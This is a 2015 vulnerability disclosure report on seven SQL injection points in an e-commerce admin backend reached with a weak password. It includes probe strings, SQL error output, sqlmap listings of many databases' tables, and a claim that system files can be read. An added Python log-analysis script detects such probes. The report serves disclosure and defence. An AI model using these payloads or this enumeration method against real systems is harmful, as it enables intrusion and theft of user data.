2015-10-01: Details sent to the vendor, awaiting vendor handling
2015-10-10: Vendor confirmed; details disclosed to the vendor only
2015-10-20: Details disclosed to core white hats and domain experts
2015-10-30: Details disclosed to regular white hats
2015-11-09: Details disclosed to intern white hats
2015-11-24: Details disclosed to the public
Logged into the backend with a weak password, then tested it and found multiple injection points.

The earlier injection tests had already yielded every account in the admin group in plaintext, so I won't say more about that. I tested with the highest-privilege account, which itself has a weak password. Shouldn't that be fixed? Admin user: admin, weak password: ******
1. Injection point one: the number list. Entering 1' returns an error, and the absolute path is exposed:

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/site/**.**.**.**/fun.php on line 40
select DISTINCT a.*,b.status as order_status,b.orderid,b.ordernum from tel_number as a left join order_info as b on a.number=b.step2 where 1 and a.type_id=1 and number like '%1'%' order by a.id desc limit 0,30
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' order by a.id desc limit 0,30' at line 1

Entering 1%' and 12=12 and '%'=' returns the normal result; entering 1%' and 12=11 and '%'=' returns an abnormal result. Injection confirmed.

2. Injection point two: the brand category list. http://**.**.**.**/admin/class/editclass.php?classid=686' returns the error:

Could not query table
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

http://**.**.**.**/admin/class/editclass.php?classid=686 and 1=1 returns the normal result; http://**.**.**.**/admin/class/editclass.php?classid=686 and 1=2 returns an error. Injection confirmed.

http://**.**.**.**/admin/class/editgrade.php?classid=703' and http://**.**.**.**/admin/class/editclass.php?classid=700' return the same error:

Could not query table
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

http://**.**.**.**/admin/class/gaddp.php?classid=703 and 1=1 and http://**.**.**.**/admin/class/gaddp.php?classid=703 and 1=2 render different checkbox states, so every place the classid parameter is used is injectable.

3. Injection point three: in the attribute list, under "expand to view the attributes of this category", pick any entry (e.g. "color") and click its edit link, which gives the address http://**.**.**.**/admin/class/editattribute.php?acid=327' and returns the error:

Could not query table
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

4. Injection point four: the product list. Entering 1' returns the error:

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/site/**.**.**.**/fun.php on line 40
Could not query table
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' order by gid desc limit 0,20' at line 1

Entering 1%' and 12=12 and '%'=' returns the normal result; entering 1%' and 12=11 and '%'=' returns an abnormal result. Injection confirmed.

5. Injection point five: the order view. Entering 1' returns the error:

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/site/**.**.**.**/fun.php on line 40
select * from order_info where 1 and ordernum='1'' order by orderid desc limit 0,20
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' order by orderid desc limit 0,20' at line 1

Entering 51871413728971' and '1'='1 returns the order normally; entering 51871413728971' and '1'='2 returns an abnormal result (no order). Injection confirmed.

6. Injection point six: the member list. Entering 1' returns the error:

Could not query table
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' order by userid desc limit 0,20' at line 1

Entering 1%' and 12=12 and '%'=' returns the normal result; entering 1%' and 12=11 and '%'=' returns an abnormal result. Injection confirmed.

7. Injection point seven: the ad management list. http://**.**.**.**/admin/ad/list.php?l=100' returns the error:

select * from ad_info where location=100' order by sort
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' order by sort' at line 1

http://**.**.**.**/admin/ad/list.php?l=100 and 1=1 returns normally; http://**.**.**.**/admin/ad/list.php?l=100 and 1=2 returns an abnormal result. Injection confirmed.
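All seven points above were found with the same boolean probe pairs: a stray quote to provoke a verbose error, then a true/false predicate (and 1=1 / and 1=2, ' and '1'='1, or the %' breakout of a LIKE pattern). The Python below is an added example, not part of the original report, showing how a defender can pick those probes out of web-server access logs and flag a client that has sent both the true and the false variant against the same parameter (the signature of blind testing). The log lines are constructed; /admin/ad/list.php and /admin/class/editclass.php are paths from the report, while /admin/order/list.php and /admin/tel/list.php are assumed names for the order-view and number-list pages.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Constructed Apache-style access-log lines (not from the report). /admin/ad/list.php and
# /admin/class/editclass.php appear in the report; /admin/order/list.php and /admin/tel/list.php
# are assumed names for the order-view and number-list pages.
SAMPLE_LOG = """\
10.0.0.5 - - [09/Nov/2015:10:00:01 +0800] "GET /admin/ad/list.php?l=100 HTTP/1.1" 200 5123
10.0.0.5 - - [09/Nov/2015:10:00:07 +0800] "GET /admin/ad/list.php?l=100%27 HTTP/1.1" 200 812
10.0.0.5 - - [09/Nov/2015:10:00:12 +0800] "GET /admin/ad/list.php?l=100%20and%201=1 HTTP/1.1" 200 5123
10.0.0.5 - - [09/Nov/2015:10:00:15 +0800] "GET /admin/ad/list.php?l=100%20and%201=2 HTTP/1.1" 200 404
10.0.0.5 - - [09/Nov/2015:10:00:40 +0800] "GET /admin/order/list.php?ordernum=51871413728971%27%20and%20%271%27%3D%271 HTTP/1.1" 200 2210
10.0.0.5 - - [09/Nov/2015:10:00:44 +0800] "GET /admin/order/list.php?ordernum=51871413728971%27%20and%20%271%27%3D%272 HTTP/1.1" 200 1020
10.0.0.5 - - [09/Nov/2015:10:01:02 +0800] "GET /admin/tel/list.php?number=1%25%27%20and%2012%3D12%20and%20%27%25%27%3D%27 HTTP/1.1" 200 6100
10.0.0.9 - - [09/Nov/2015:10:01:30 +0800] "GET /admin/class/editclass.php?classid=686 HTTP/1.1" 200 3001
"""

# Common-log-format request line: client, timestamp, method, target, status, response size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r"(?P<status>\d{3}) (?P<size>\d+|-)"
)

# The probe shapes seen in the report, applied to the URL-decoded parameter value.
PROBE_PATTERNS = [
    ("numeric tautology", re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+", re.I)),      # 100 and 1=1
    ("quoted tautology", re.compile(r"'\s*(and|or)\s*'[^']*'\s*=\s*'", re.I)),  # ' and '1'='1
    ("LIKE wildcard breakout", re.compile(r"%'\s*(and|or)\b", re.I)),           # 1%' and ...
]
# Extracts the two sides of the injected comparison so we can tell a "true" probe from a "false" one.
PREDICATE_RE = re.compile(r"\b(?:and|or)\s+'?(\w+)'?\s*=\s*'?(\w+)'?", re.I)


def classify_value(value):
    """Return the probe labels that apply to one decoded parameter value."""
    labels = [label for label, rx in PROBE_PATTERNS if rx.search(value)]
    if value.count("'") % 2 == 1:          # a lone quote, e.g. the 1' error probe
        labels.append("unbalanced quote")
    return labels


def predicate_truth(value):
    """True/False for an injected comparison (1=1 vs 1=2), None if there is none."""
    m = PREDICATE_RE.search(value)
    return None if m is None else m.group(1) == m.group(2)


def analyze(log_text):
    """Return (findings, probe_pairs): per-request hits and (ip, path, param) keys that
    received both a true and a false predicate, i.e. a boolean-blind test."""
    findings = []
    truth_seen = defaultdict(set)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["target"])
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            labels = classify_value(value)
            if not labels:
                continue
            findings.append({"ip": m["ip"], "path": parts.path, "param": name, "value": value,
                             "labels": labels, "status": m["status"], "size": m["size"]})
            truth = predicate_truth(value)
            if truth is not None:
                truth_seen[(m["ip"], parts.path, name)].add(truth)
    pairs = sorted(key for key, seen in truth_seen.items() if seen == {True, False})
    return findings, pairs


def main():
    findings, pairs = analyze(SAMPLE_LOG)
    for f in findings:
        print(f"{f['ip']} {f['path']} {f['param']}={f['value']!r} -> {', '.join(f['labels'])} "
              f"(status {f['status']}, {f['size']} bytes)")
    for ip, path, param in pairs:
        print(f"boolean-blind probe pair from {ip} on {path}, parameter {param!r}")


if __name__ == "__main__":
    main()
```

The response size is carried along in each finding because, as the report's own true/false results show, a boolean-blind probe leaves the status code at 200 and only the body length differs; a rule that keys on status alone misses it.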
Taking the seventh injection point as the example, test with sqlmap: capture the request, or add the cookies, otherwise the injection cannot proceed.
Database: dspam
+----------------------+---------+
| Table                | Entries |
+----------------------+---------+
| dspam_token_data     | 4649647 |   several million records, no idea what they are, didn't look!~~~
| dspam_signature_data |  225707 |
| dspam_preferences    |      33 |
| dspam_stats          |       5 |
| dspam_virtual_uids   |       5 |
+----------------------+---------+

Database: ego10000
+-----------------------------------+---------+
| Table                             | Entries |
+-----------------------------------+---------+
| userinfo                          |    2938 |
| order_detail_info                 |    2302 |
| order_info                        |    2011 |
| goods_taocan_value                |    1365 |
| goods_taocan_attr                 |    1274 |
| search_log                        |    1212 |
| notice                            |    1148 |
| usercent                          |    1147 |
| gift_order                        |    1141 |
| attribute_value_info              |    1082 |
| goods_more_info                   |     960 |
| ask_goods_info                    |     689 |
| goods_image_info                  |     685 |
| telnumber                         |     566 |
| order_network                     |     430 |
| goods_mutuality_info              |     371 |
| shop_basket                       |     343 |
| goods_info                        |     270 |
| goods_taocan                      |     147 |
| activityinfo                      |      95 |
| tel_number                        |      77 |
| rcmdgoods                         |      73 |
| create_html                       |      68 |
| adminmenu                         |      67 |
| news                              |      55 |
| class_info                        |      45 |
| gp_class                          |      45 |
| tel_type_template_attr            |      39 |
| attribute_class_select_value_info |      36 |
| act_user_award_info               |      35 |
| repair                            |      30 |
| tel_taocan_value                  |      30 |
| ad_info                           |      22 |
| dispatch_pay_mutuality_info       |      16 |
| adminuser                         |      15 |
| dispatch_mode_info                |      13 |
| act_award_info                    |      11 |
| attribute_class_info              |      10 |
| tel_type                          |       8 |
| goods_fitting_mutuality_info      |       5 |
| tel_type_template                 |       5 |
| admingroup                        |       2 |
| gift_info                         |       2 |
+-----------------------------------+---------+

Database: extmail
+----------------+---------+
| Table          | Entries |
+----------------+---------+
| mailbox        |      42 |
| alias          |      37 |
| `domain`       |       2 |
| domain_manager |       2 |
| manager        |       2 |
+----------------+---------+

Database: hallylure
+-----------------------------------------+---------+
| Table                                   | Entries |
+-----------------------------------------+---------+
| hallylure_ucenter_memberfields          |  225937 |
| hallylure_ucenter_members               |  225937 |   200k+ users
| hallylure_common_member_newprompt       |  225934 |
| hallylure_home_notification             |  215655 |
| hallylure_common_credit_rule_log        |  215248 |
| hallylure_common_member                 |  215104 |   also 200k+ users
| hallylure_common_member_count           |  215104 |
| hallylure_common_member_field_forum     |  215104 |
| hallylure_common_member_field_home      |  215104 |
| hallylure_common_member_profile         |  215104 |
| hallylure_common_member_status          |  215104 |
| hallylure_common_onlinetime             |  198587 |
| hallylure_common_district               |   45051 |
| hallylure_forum_statlog                 |    6930 |
| hallylure_security_failedlog            |    3953 |
| hallylure_forum_post                    |    2519 |
| hallylure_forum_filter_post             |    1159 |
| hallylure_forum_attachment              |     921 |
| hallylure_common_statuser               |     614 |
| hallylure_forum_threadpartake           |     606 |
| hallylure_common_stat                   |     533 |
| hallylure_forum_thread                  |     491 |
| hallylure_forum_post_tableid            |     486 |
| hallylure_common_setting                |     433 |
| hallylure_forum_sofa                    |     356 |
| hallylure_forum_threadhot               |     182 |
| hallylure_forum_attachment_0            |     134 |
| hallylure_forum_attachment_7            |     131 |
| hallylure_forum_attachment_8            |     124 |
| hallylure_common_syscache               |     108 |
| hallylure_forum_rsscache                |     106 |
| hallylure_forum_threadimage             |     106 |
| hallylure_common_block_style            |     103 |
| hallylure_forum_modwork                 |     101 |
| hallylure_forum_attachment_5            |      99 |
| hallylure_forum_attachment_9            |      98 |
| hallylure_forum_attachment_1            |      92 |
| hallylure_forum_threadcalendar          |      86 |
| hallylure_common_smiley                 |      85 |
| hallylure_forum_attachment_3            |      84 |
| hallylure_common_admincp_perm           |      67 |
| hallylure_ucenter_pm_indexes            |      63 |
| hallylure_forum_attachment_6            |      61 |
| hallylure_forum_attachment_2            |      59 |
| hallylure_common_nav                    |      52 |
| hallylure_common_member_profile_setting |      51 |
| hallylure_ucenter_pm_members            |      48 |
| hallylure_forum_forumfield              |      47 |
| hallylure_forum_forum                   |      46 |
| hallylure_common_stylevar               |      45 |
| hallylure_common_optimizer              |      34 |
| hallylure_connect_memberbindlog         |      33 |
| hallylure_forum_attachment_4            |      33 |
| hallylure_common_credit_rule            |      32 |
| hallylure_common_member_connect         |      29 |
| hallylure_ucenter_settings              |      26 |
| hallylure_ucenter_pm_lists              |      24 |
| hallylure_common_cron                   |      20 |
| hallylure_common_usergroup              |      20 |
| hallylure_common_usergroup_field        |      20 |
| hallylure_home_click                    |      15 |
| hallylure_common_failedlogin            |      14 |
| hallylure_common_connect_guest          |      13 |
| hallylure_common_plugin                 |      12 |
| hallylure_forum_threadmod               |      12 |
| hallylure_forum_medal                   |      10 |
| hallylure_ucenter_notelist              |       9 |
| hallylure_ucenter_pm_messages_2         |       9 |
| hallylure_ucenter_pm_messages_9         |       9 |
| hallylure_ucenter_newpm                 |       8 |
| hallylure_common_admingroup             |       7 |
| hallylure_ucenter_pm_messages_3         |       7 |
| hallylure_ucenter_pm_messages_4         |       7 |
| hallylure_common_admincp_cmenu          |       6 |
| hallylure_forum_typeoption              |       6 |
| hallylure_ucenter_pm_messages_0         |       6 |
| hallylure_ucenter_pm_messages_7         |       6 |
| hallylure_common_admincp_group          |       5 |
| hallylure_common_friendlink             |       5 |
| hallylure_common_member_crime           |       5 |
| hallylure_ucenter_pm_messages_1         |       5 |
| hallylure_ucenter_pm_messages_6         |       5 |
| hallylure_ucenter_pm_messages_8         |       5 |
| hallylure_common_failedip               |       4 |
| hallylure_common_member_action_log      |       4 |
| hallylure_forum_attachment_unused       |       4 |
| hallylure_forum_bbcode                  |       4 |
| hallylure_forum_onlinelist              |       4 |
| hallylure_home_friend                   |       4 |
| hallylure_ucenter_pm_messages_5         |       4 |
| hallylure_forum_grouplevel              |       3 |
| hallylure_forum_imagetype               |       3 |
| hallylure_common_admincp_session        |       2 |
| hallylure_common_block                  |       2 |
| hallylure_common_cache                  |       2 |
| hallylure_common_template_block         |       2 |
| hallylure_common_word_type              |       2 |
| hallylure_forum_faq                     |       2 |
| hallylure_forum_hotreply_member         |       2 |
| hallylure_forum_hotreply_number         |       2 |
| hallylure_home_favorite                 |       2 |
| hallylure_home_friend_request           |       2 |
| hallylure_home_friendlog                |       2 |
| hallylure_mobile_setting                |       2 |
| hallylure_common_credit_rule_log_field  |       1 |
| hallylure_common_diy_data               |       1 |
| hallylure_common_searchindex            |       1 |
| hallylure_common_style                  |       1 |
| hallylure_common_template               |       1 |
| hallylure_forum_promotion               |       1 |
| hallylure_forum_threadprofile           |       1 |
| hallylure_forum_threadtype              |       1 |
| hallylure_home_visitor                  |       1 |
| hallylure_ucenter_admins                |       1 |
| hallylure_ucenter_applications          |       1 |
| hallylure_ucenter_failedlogins          |       1 |
+-----------------------------------------+---------+

Database: shopstit
+-----------------------------------+---------+
| Table                             | Entries |
+-----------------------------------+---------+
| attribute_value_info              |   18916 |
| shop_basket                       |    6900 |
| goods_image_info                  |    3742 |
| goods_info                        |    1993 |
| search_log                        |    1212 |
| notice                            |    1148 |
| userinfo                          |     830 |   users
| goods_mutuality_info              |     719 |
| ask_goods_info                    |     691 |
| order_detail_info                 |     665 |
| telnumber                         |     566 |
| rcmdgoods                         |     446 |
| order_info                        |     420 |
| news                              |     418 |
| attribute_class_select_value_info |     367 |
| gp_class                          |     359 |
| attribute_class_info              |     280 |
| class_info                        |     163 |
| goods_fav                         |     100 |
| activityinfo                      |      95 |
| usercent                          |      87 |
| adminmenu                         |      79 |
| create_html                       |      68 |
| sms                               |      63 |
| act_user_award_info               |      35 |
| repair                            |      30 |
| goods_fitting_mutuality_info      |      26 |
| dispatch_pay_mutuality_info       |      17 |
| dispatch_mode_info                |      13 |
| act_award_info                    |      10 |
| adminuser                         |       8 |   administrators
| admingroup                        |       5 |
+-----------------------------------+---------+

Database: stit_v3
+-----------------------------------+---------+
| Table                             | Entries |
+-----------------------------------+---------+
| goods_taocan_attr                 |    1303 |
| goods_taocan_value                |    1289 |
| search_log                        |    1212 |
| notice                            |    1148 |
| attribute_value_info              |    1091 |
| goods_more_info                   |    1072 |
| goods_image_info                  |     793 |
| ask_goods_info                    |     689 |
| tel_number                        |     670 |
| telnumber                         |     566 |
| goods_mutuality_info              |     407 |
| goods_info                        |     298 |
| userinfo                          |     280 |   users
| order_detail_info                 |     248 |
| gp_class                          |     214 |
| order_info                        |     195 |
| news                              |     158 |
| goods_taocan                      |     156 |
| tel_type_template_attr            |     121 |
| shop_basket                       |     114 |
| activityinfo                      |      95 |
| rcmdgoods                         |      94 |
| create_html                       |      68 |
| adminmenu                         |      64 |
| tel_taocan_value                  |      55 |
| class_info                        |      48 |
| act_user_award_info               |      35 |
| repair                            |      30 |
| attribute_class_select_value_info |      28 |
| goods_fitting_mutuality_info      |      22 |
| ad_info                           |      20 |
| order_network                     |      17 |
| tel_type_template                 |      14 |
| dispatch_pay_mutuality_info       |      13 |
| tel_type                          |      13 |
| dispatch_mode_info                |      12 |
| act_award_info                    |      11 |
| attribute_class_info              |       9 |
| adminuser                         |       5 |   administrators
| admingroup                        |       1 |
| gift_info                         |       1 |
+-----------------------------------+---------+

Database: ybzdb
+---------------------+---------+
| Table               | Entries |
+---------------------+---------+
| v9_linkage          |    3284 |
| v9_menu             |     349 |
| v9_model_field      |     103 |
| v9_guestbook        |      43 |
| v9_hits             |      33 |
| v9_search           |      33 |
| v9_position_data    |      30 |
| v9_cache            |      29 |
| v9_news             |      29 |
| v9_news_data        |      29 |
| v9_admin_role_priv  |      28 |
| v9_module           |      27 |
| v9_category_priv    |      23 |
| v9_attachment       |      19 |
| v9_category         |      17 |
| v9_page             |      11 |
| v9_poster           |      10 |
| v9_poster_space     |      10 |
| v9_urlrule          |       8 |
| v9_admin_role       |       7 |
| v9_member_group     |       7 |
| v9_type             |       7 |
| v9_position         |       6 |
| v9_model            |       5 |
| v9_sso_settings     |       5 |
| v9_biaodan_data     |       4 |
| v9_picture          |       4 |
| v9_picture_data     |       4 |
| v9_workflow         |       4 |
| v9_admin_panel      |       3 |
| v9_member_menu      |       3 |
| v9_admin            |       2 |   administrators
| v9_announce         |       2 |
| v9_attachment_index |       2 |
| v9_link             |       2 |
| v9_comment_setting  |       1 |
| v9_comment_table    |       1 |
| v9_session          |       1 |
| v9_site             |       1 |
| v9_sso_admin        |       1 |   administrators
| v9_sso_applications |       1 |
| v9_wap              |       1 |
+---------------------+---------+

Database: mysql
+---------------+---------+
| Table         | Entries |
+---------------+---------+
| help_relation |     993 |
| help_topic    |     508 |
| help_keyword  |     452 |
| help_category |      38 |
| `user`        |       9 |
| db            |       6 |
| func          |       5 |
| cgfuhc        |       2 |
| ehuyzk32      |       2 |
| ejfjxv32      |       2 |
| gjippi        |       2 |
| jtjqbr        |       2 |
| nciupb32      |       2 |
| omrnqa        |       2 |
| qpicbb        |       2 |
| ysqzut        |       2 |
| yttxfg32      |       2 |
| zcsxqm32      |       2 |
| zfdipw32      |       2 |
| abcgv         |       1 |
| abcgvmo       |       1 |
| tempEx        |       1 |
| tempExT1      |       1 |
+---------------+---------+
The database privileges are extensive: arbitrary files on the site can be read, e.g. /etc/passwd.

The mysql password can be cracked and used to connect to the database directly.

Fix: add input filtering. If this is a decommissioned system, shut it down quickly!~~~
Severity: Medium
Vulnerability Rank: 10
Confirmed: 2015-10-10 17:02
CNVD confirms the situation described; the case has been forwarded via CNCERT to China Telecom Group, which will coordinate handling with the website's operating unit.